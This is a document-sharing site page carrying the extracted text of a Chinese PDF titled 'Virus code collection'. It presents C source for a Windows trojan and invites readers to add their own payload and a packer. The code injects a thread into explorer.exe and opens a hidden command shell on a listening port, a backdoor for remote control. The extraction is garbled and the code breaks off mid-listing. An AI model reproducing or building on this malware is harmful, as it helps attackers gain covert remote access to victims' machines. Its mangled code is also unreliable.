病毒代码大全.pdf
《病毒代码大全.pdf》由会员分享,可在线阅读,更多相关《病毒代码大全.pdf(16页珍藏版)》请在三一文库上搜索。
1、制造木马 病毒代码大全2008-06-08 19:46 制造木马 病毒代 码大全 一个简单的木马原型基础代码添加上自己的XXX, 加上变态的壳,做点小修改,就可 以 #include #pragma comment(lib,“ws2_32.lib“) #include #include #pragma comment(lib,“Shlwapi.lib“) #include #include #include /参数结构; typedef struct _RemotePara DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAdd
2、ress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe
3、; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox12; char winsockDll16; char cmd10; char Buff4096; char telnetmsg60; RemotePara; / 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); / 根据进程名称得到进程ID DWORD GetPidByName(char *szName); / 远程线程执行 体 DWORD _stdcal
4、l ThreadProc(RemotePara *Para) WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWrit
5、ePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (_stdcall *PLoadLibrary)(char*); typedef FARPROC (_stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (_stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (_stdcall *PGetMod
6、uleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PClose
7、Handle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para-dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para-dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para-dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc
8、= (PGetModuleHandle)Para-dwGetModuleHandle; LoadLibraryFunc(Para-winsockDll); PWSAStartup = (FARPROC)Para-dwWSAStartup; PSocket = (FARPROC)Para-dwSocket; Phtons = (FARPROC)Para-dwhtons; Pbind = (FARPROC)Para-dwbind; Plisten = (FARPROC)Para-dwlisten; Paccept = (FARPROC)Para-dwaccept; Psend = (FARPROC
9、)Para-dwsend; Precv = (FARPROC)Para-dwrecv; Pclosesocket = (FARPROC)Para-dwclosesocket; PCreateProcessA = (FARPROC)Para-dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para-dwPeekNamedPipe; PWriteFile = (FARPROC)Para-dwWriteFile; PReadFile = (FARPROC)Para-dwReadFile; PCloseHandle = (FARPROC)Para-dwClose
10、Handle; PCreatePipe = (FARPROC)Para-dwCreatePipe; PTerminateProcess = (FARPROC)Para-dwTerminateProcess; PMessageBoxA = (FARPROC)Para-dwMessageBox; nVersion = MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA) listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket = INVALID_SOCKET)return 0; s
11、erver_addr.sin_family = AF_INET; server_addr.sin_port = Phtons(unsigned short)(8129); server_addr.sin_addr.s_addr = INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *) if(Plisten(listenSocket, 5)return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *) / Psend(clientSocket, Para-telnetms
12、g, 60, 0); if(!PCreatePipe( if(!PCreatePipe( ZeroMemory( /ZeroMemory 是 C 运行库 函数,可以直接调用si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; if(!PCreateProcessA(NULL,Para-cmd,NULL,NULL,1,0,NUL L,NULL, w
13、hile(1) memset(Para-Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para-Buff,4096, if(lBytesRead) if(!PReadFile(hReadPipe1, Para-Buff, lBytesRead, if(!Psend(clientSocket, Para-Buff, lBytesRead, 0)break; else lBytesRead=Precv(clientSocket, Para-Buff, 4096, 0); if(lBytesRead Buff, lBytesRead, PCloseHandle(hW
14、ritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); / PMessageBoxA(NULL, Para-strMessageBox, Para-strMessageBox, MB_OK); return 0; int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR l
15、pCmdLine, int nCmdShow) const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara myRemotePara,*pRemotePara; DWORD pID; OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_ PRIVILEGES, EnablePrivilege(hToken,
16、SE_DEBUG_NAME,TRUE); / 获得 指定进程句柄, 并设其权限为PROCESS_ALL_ACCESS pID = GetPidByName(“EXPLORER.EXE“); if(pID = 0)return 0; hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID); if(!hRemoteProcess)return 0; / 在远程进程地址空间分配 虚拟内存pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | ME
17、M_RESERVE,PAGE_EXECUTE_READWRITE); if(!pRemoteThread)return 0; / 将线程执行体ThreadProc 写入远程进程if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, ZeroMemory( hKernel = LoadLibrary( “kernel32.dll“); myRemotePara.dwLoadLibrary = (DWORD)GetProcAddress(hKernel, “LoadLibraryA“); myRemotePara.dwFreeLibrary =
18、(DWORD)GetProcAddress(hKernel, “FreeLibrary“); myRemotePara.dwGetProcAddress = (DWORD)GetProcAddress(hKernel, “GetProcAddress“); myRemotePara.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel, “GetModuleHandleA“); myRemotePara.dwCreateProcessA = (DWORD)GetProcAddress(hKernel, “CreateProcessA“); myRe
19、motePara.dwPeekNamedPipe = (DWORD)GetProcAddress(hKernel, “PeekNamedPipe“); myRemotePara.dwWriteFile = (DWORD)GetProcAddress(hKernel, “WriteFile“); myRemotePara.dwReadFile = (DWORD)GetProcAddress(hKernel, “ReadFile“); myRemotePara.dwCloseHandle = (DWORD)GetProcAddress(hKernel, “CloseHandle“); myRemo
20、tePara.dwCreatePipe = (DWORD)GetProcAddress(hKernel, “CreatePipe“); myRemotePara.dwTerminateProcess = (DWORD)GetProcAddress(hKernel, “TerminateProcess“); hSock = LoadLibrary(“wsock32.dll“); myRemotePara.dwWSAStartup = (DWORD)GetProcAddress(hSock,“WSAStartup“); myRemotePara.dwSocket = (DWORD)GetProcA
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 病毒 代码 大全
链接地址:https://www.31doc.com/p-4745394.html